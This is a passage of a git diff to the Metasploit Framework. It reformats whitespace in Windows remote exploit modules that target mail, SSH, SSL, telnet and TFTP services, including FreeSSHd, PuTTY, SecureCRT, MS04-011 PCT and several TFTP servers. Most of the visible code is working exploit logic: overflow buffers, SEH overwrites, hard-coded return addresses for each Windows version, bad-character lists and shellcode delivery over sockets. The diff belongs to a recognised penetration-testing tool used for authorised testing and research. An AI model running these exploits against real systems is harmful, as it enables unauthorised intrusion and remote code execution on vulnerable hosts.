print_status("Unable to connect or Exchange has crashed... Retrying.") count += 1 retry diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index d101ea31a8..49b966b96a 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,11 +18,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SoftiaCom WMailserver 1.0 Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in SoftiaCom WMailserver 1.0 - (SMTP) via a SEH frame overwrite. + This module exploits a stack overflow in SoftiaCom WMailserver 1.0 + (SMTP) via a SEH frame overwrite. }, 'Author' => [ 'MC' ], 'Version' => '$Revision$', @@ -46,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x0a\x0d\x20", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], @@ -54,19 +52,19 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 11 2005 ')) - register_options([ Opt::RPORT(25) ], self.class) + register_options([ Opt::RPORT(25) ], self.class) end def exploit connect - + filler = " " + rand_text_alpha_upper(5115) seh = generate_seh_payload(target.ret) - sploit = filler + seh + rand_text_alpha_upper(200) - - print_status("Trying target #{target.name}...") + sploit = filler + seh + rand_text_alpha_upper(200) + + print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index b186a7d70e..b647e438e4 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -3,32 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Smtp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'YPOPS 0.6 Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the YPOPS POP3 + This module exploits a stack overflow in the YPOPS POP3 service. This is a classic stack overflow for YPOPS version 0.6. Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to jmp ebx opcode in ws_32.dll - }, 'Author' => [ 'acaro <acaro@jervus.it>' ], 'Version' => '$Revision$', @@ -38,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '10367'], [ 'BID', '11256'], [ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'], - ], 'Platform' => 'win', 'Privileged' => false, @@ -47,9 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1200, 'BadChars' => "\x00\x25", 'MinNops' => 106, - }, - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP0 Italian', { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ], [ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ], @@ -85,16 +80,16 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - pattern = + pattern = rand_text_alpha(target['Offset'] - payload.encoded.length) + payload.encoded + - [target.ret].pack('V') + + [target.ret].pack('V') + "\n" print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}") sock.put(pattern) - + handler disconnect end diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index 5e8d533039..9e13ec0371 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow', 'Description' => %q{ - This module exploits a simple stack overflow in FreeFTPd 1.0.10 + This module exploits a simple stack overflow in FreeFTPd 1.0.10 This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This module is based on MC's freesshd_key_exchange exploit. @@ -30,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'riaf [at] mysec.org', 'License' => BSD_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-2407'], ['OSVDB', '25569'], ['BID', '17958'], @@ -47,42 +45,40 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x750231e2 } ], [ 'Windows 2000 SP0-SP4 German', { 'Ret' => 0x74f931e2 } ], [ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1d54 } ], - [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ], + [ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ], ], - 'Privileged' => true, - 'DisclosureDate' => 'May 12 2006', - 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(22) ], self.class) - + register_options( + [ + Opt::RPORT(22) + ], self.class) end def exploit connect - sploit = "SSH-2.0-OpenSSH_3.9p1" + sploit = "SSH-2.0-OpenSSH_3.9p1" sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00" sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V') sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n" - + res = sock.recv(40) - if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/) - print_status("Trying target #{target.name}...") - sock.put(sploit) - else - print_status("Not running a vulnerable version...") - end - + if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/) + print_status("Trying target #{target.name}...") + sock.put(sploit) + else + print_status("Not running a vulnerable version...") + end + handler disconnect diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index 351d1adf2f..8a31d4688a 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow', 'Description' => %q{ - This module exploits a simple stack overflow in FreeSSHd 1.0.9. + This module exploits a simple stack overflow in FreeSSHd 1.0.9. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-2407'], ['OSVDB', '25463'], ['BID', '17958'], @@ -46,41 +44,39 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e51877 } ], [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ], ], - 'Privileged' => true, - 'DisclosureDate' => 'May 12 2006', - 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(22) ], self.class) - + register_options( + [ + Opt::RPORT(22) + ], self.class) end def exploit connect - sploit = "SSH-2.0-OpenSSH_3.9p1" + sploit = "SSH-2.0-OpenSSH_3.9p1" sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00" sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde" sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V') sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n" - + res = sock.recv(22) - if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/) - print_status("Trying target #{target.name}...") - sock.put(sploit) - else - print_status("Not running a vulnerable version...") - end - + if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/) + print_status("Trying target #{target.name}...") + sock.put(sploit) + else + print_status("Not running a vulnerable version...") + end + handler disconnect diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index ce90cd9938..f1c05d3137 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -20,14 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'PuTTy.exe <= v0.53 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the PuTTY SSH client that is triggered + This module exploits a buffer overflow in the PuTTY SSH client that is triggered through a validation error in SSH.c. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2002-1359' ], [ 'OSVDB', '8044'], [ 'URL', 'http://www.rapid7.com/advisories/R7-0009.html' ], @@ -56,13 +54,13 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ]) ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) buffer = "SSH-2.0-OpenSSH_3.6.1p2\r\n" + diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index 4f8b20aa29..6a9c5cc8be 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in SecureCRT <= 4.0 + This module exploits a buffer overflow in SecureCRT <= 4.0 Beta 2. By sending a vulnerable client an overly long SSH1 protocol identifier string, it is possible to execute arbitrary code. @@ -30,8 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2002-1059' ], [ 'OSVDB', '4991' ], [ 'BID', '5287' ], @@ -57,13 +55,13 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The SSH daemon port to listen on", 22 ]) ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) buffer = "SSH-1.1-OpenSSH_3.6.1p2\r\n" + rand_text_english(243) buffer << [target.ret].pack('V') + make_nops(20) + payload.encoded diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 3cc050c13f..f7fe72a825 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Private Communications Transport Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Microsoft + This module exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack. This code is based on Johnny Cyberpunk's THC release and has been tested against Windows 2000 and Windows XP. To use this module, specify the remote @@ -35,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS 5.1). Using the wrong target may not result in an immediate crash of the remote system. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -59,72 +56,72 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'Windows 2000 SP4', { 'Platform' => 'win', 'Ret' => 0x67419ce8, # jmp [esp + 0x6c] }, ], - [ + [ 'Windows 2000 SP3', { 'Platform' => 'win', 'Ret' => 0x67419e1d, # jmp [esp + 0x6c] }, - ], - [ + ], + [ 'Windows 2000 SP2', { 'Platform' => 'win', 'Ret' => 0x6741a426, # jmp [esp + 0x6c] }, ], - [ + [ 'Windows 2000 SP1', { 'Platform' => 'win', 'Ret' => 0x77e4f44d, # jmp [ebx + 0x14] }, ], - [ + [ 'Windows 2000 SP0', { 'Platform' => 'win', 'Ret' => 0x7658a6cb, # jmp [ebx + 0x0e] }, ], - [ + [ 'Windows XP SP0', { 'Platform' => 'win', 'Ret' => 0x0ffb7de9, # jmp [esp + 0x6c] }, ], - [ + [ 'Windows XP SP1', { 'Platform' => 'win', 'Ret' => 0x0ffb832f, # jmp [esp + 0x6c] }, - ], + ], ], 'DisclosureDate' => 'Apr 13 2004', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"]) - ], self.class) + + register_options( + [ + OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"]) + ], self.class) end def exploit connect - + print_status("Trying target #{target.name} with proto #{datastore['PROTO']}...") - + # This is a heap ptr to the ssl request # ... and just happens to not die ... # Thanks to CORE and Halvar @@ -134,35 +131,35 @@ class Metasploit3 < Msf::Exploit::Remote # 0016 => add [esi], dl # 8f8201000000 => pop [esi+1] # eb0f => jmp short 11 to shellcode - + buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+ "\xeb\x0f" + 'XXXXXXXXXXX' + [target.ret ^ 0xffffffff].pack('V')+ payload.encoded - + # Connect to a SMTP service, call STARTTLS if (datastore['PROTO'] == 'smtp') greeting = sock.get_once sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n") resp = sock.get_once - + sock.put("STARTTLS\r\n") resp = sock.get_once - + if (resp and resp !~ /^220/) print_status("Warning: this server may not support STARTTLS") end - + end - + sock.put(buf) resp = sock.get_once - + if (resp == "\x00\x00\x01") print_status("The response indicates that the PCT protocol is disabled") end - + handler disconnect end diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index f0f3f3e86b..9917437efc 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -3,118 +3,116 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh - def initialize(info = {}) - super(update_info(info, + def initialize(info = {}) + super(update_info(info, 'Name' => 'GAMSoft TelSrv 1.5 Username Buffer Overflow', 'Description' => %q{ - This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5. - Other versions may also be affected. The service terminates after exploitation, - so you only get one chance! + This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5. + Other versions may also be affected. The service terminates after exploitation, + so you only get one chance! }, 'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], - 'Arch' => [ ARCH_X86 ], + 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => - [ - [ 'CVE', '2000-0665'], - [ 'OSVDB', '373'], - [ 'BID', '1478'], - [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'], - ], - 'Privileged' => false, + [ + [ 'CVE', '2000-0665'], + [ 'OSVDB', '373'], + [ 'BID', '1478'], + [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'], + ], + 'Privileged' => false, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => - { + { 'Space' => 1000, 'BadChars' => "\x00\x0a", 'StackAdjustment' => -3500, }, 'Platform' => ['win'], 'Targets' => - [ - [ - 'Windows 2000 Pro SP0/4 English REMOTE', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 1886, - } + [ + [ 'Windows 2000 Pro SP0/4 English REMOTE', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 1886, + } + ], + + [ 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 3318, + } + ], + + [ 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)', + { + 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL + 'Offset' => 3358, + } + ], +=begin + [ 'Windows XP Pro SP0/1 English', + { + 'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL + 'Offset' => 2600, # this is made up and absolutely wrong ;-) + } + ], +=end ], - [ - 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 3318, - } - ], - [ - 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)', - { - 'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL - 'Offset' => 3358, - } - ], - #[ - #'Windows XP Pro SP0/1 English', - #{ - # 'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL - # 'Offset' => 2600, # this is made up and absolutely wrong ;-) - #} - #], - #[ - ], - 'DisclosureDate' => 'Jul 17 2000', + 'DisclosureDate' => 'Jul 17 2000', 'DefaultTarget' => 0)) - - register_options( + + register_options( [ Opt::RPORT(23), ], self.class) end - def check + def check connect print_status("Attempting to determine if target is vulnerable...") sleep(7) banner = sock.get_once(-1,3) if (banner =~ /TelSrv 1\.5/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit - print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") + print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") connect print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep. - sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. + sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. username = rand_text_english(20000, payload_badchars) seh = generate_seh_payload(target.ret) username[target['Offset'], seh.length] = seh - + print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...") sock.put(username) sleep(0.25) - print_status('Exploit sent...') + print_status('Exploit sent...') handler disconnect end diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index 8b04d96384..fa2764e96b 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::Seh - + include Msf::Exploit::Remote::Seh + def initialize(info = {}) super(update_info(info, 'Name' => 'GoodTech Telnet Server <= 5.0.6 Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in GoodTech Systems Telnet Server - versions prior to 5.0.7. By sending an overly long string, an attacker can + This module exploits a stack overflow in GoodTech Systems Telnet Server + versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution. }, 'License' => MSF_LICENSE, @@ -39,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 400, @@ -47,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], @@ -56,7 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 15 2005', 'DefaultTarget' => 0)) - register_options([ Opt::RPORT(2380) ], self) + register_options( + [ + Opt::RPORT(2380) + ], self.class) end def exploit diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 408e737989..cc797be62e 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -21,17 +21,18 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in D-Link TFTP 1.0. - By sending a request for an overly long file name, an attacker - could overflow a buffer and execute arbitrary code. For best results, - use bind payloads with nonx (No NX). + By sending a request for an overly long file name, an attacker + could overflow a buffer and execute arbitrary code. For best results, + use bind payloads with nonx (No NX). }, - 'Author' => [ - 'LSO <lso[@]hushmail.com>', # Exploit module - 'patrick', # Refs, stability, targets etc - ], + 'Author' => + [ + 'LSO <lso[@]hushmail.com>', # Exploit module + 'patrick', # Refs, stability, targets etc + ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2007-1435' ], [ 'OSVDB', '33977' ], [ 'BID', '22923' ], @@ -44,14 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 1024, 'BadChars' => "\x00", - 'Compat' => + 'Compat' => { 'ConnectionType' => '-reverse', }, }, 'SaveRegisters' => [ 'ecx', 'eax', 'esi' ], 'Platform' => 'win', - + 'Targets' => [ # Patrick tested OK 20090228 @@ -62,8 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 12 2007', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(69)], self) - + register_options( + [ + Opt::RPORT(69) + ], self) end def exploit @@ -71,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") - juju = "\x00\x01" + juju = "\x00\x01" juju << Rex::Text.rand_text_alpha_upper(581) juju << Rex::Arch::X86.jmp_short(42) juju << Rex::Text.rand_text_alpha_upper(38) juju << [target.ret].pack('V') + payload.encoded - + udp_sock.put(juju) handler @@ -84,4 +87,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index 36006eeaeb..704d0d309a 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,18 +21,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow', 'Description' => %q{ - This module exploits a stack overflow in the FutureSoft TFTP Server + This module exploits a stack overflow in the FutureSoft TFTP Server 2000 product. By sending an overly long transfer-mode string, we were able - to overwrite both the SEH and the saved EIP. A subsequent write-exception - that will occur allows the transferring of execution to our shellcode + to overwrite both the SEH and the saved EIP. A subsequent write-exception + that will occur allows the transferring of execution to our shellcode via the overwritten SEH. This module has been tested against Windows - 2000 Professional and for some reason does not seem to work against + 2000 Professional and for some reason does not seem to work against Windows 2000 Server (could not trigger the overflow at all). }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2005-1812'], ['OSVDB', '16954'], ['BID', '13821'], @@ -51,23 +49,18 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, - 'Platform' => 'win', - 'Targets' => [ ['Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4} ], # ws2help.dll ['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad} ], # ws2help.dll ['Windows NT SP5/SP6a English', { 'Ret' => 0x776a1799} ], # ws2help.dll ['Windows 2003 Server English', { 'Ret' => 0x7ffc0638} ], # PEB return - ], - 'Privileged' => true, - 'DisclosureDate' => 'May 31 2005')) - register_options( + register_options( [ Opt::RPORT(69) ], self.class) diff --git a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb index 466acb542c..230592295e 100644 --- a/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb +++ b/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -11,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Quick FTP Pro 2.1 Transfer-Mode Overflow', 'Description' => %q{ - This module exploits a stack overflow in the Quick TFTP Pro server + This module exploits a stack overflow in the Quick TFTP Pro server product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting in a DoS. This is a port of a sploit by Mati "muts" Aharoni. }, 'Author' => 'Saint Patrick', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2008-1610'], ['OSVDB', '43784'], ['BID', '28459'], @@ -34,20 +44,16 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, - 'Platform' => 'win', - 'Targets' => - [ + [ ['Windows Server 2000', { 'Ret' => 0x75022AC4} ], #ws2help.dll ['Windows XP SP2', {'Ret' => 0x74D31458} ], #oledlg.dll ], - 'DefaultTarget' => 1, - 'DisclosureDate' => 'March 27 2008')) - register_options( + register_options( [ Opt::RPORT(69) ], self.class) diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index c6a1b4e58b..52e93d05b4 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is 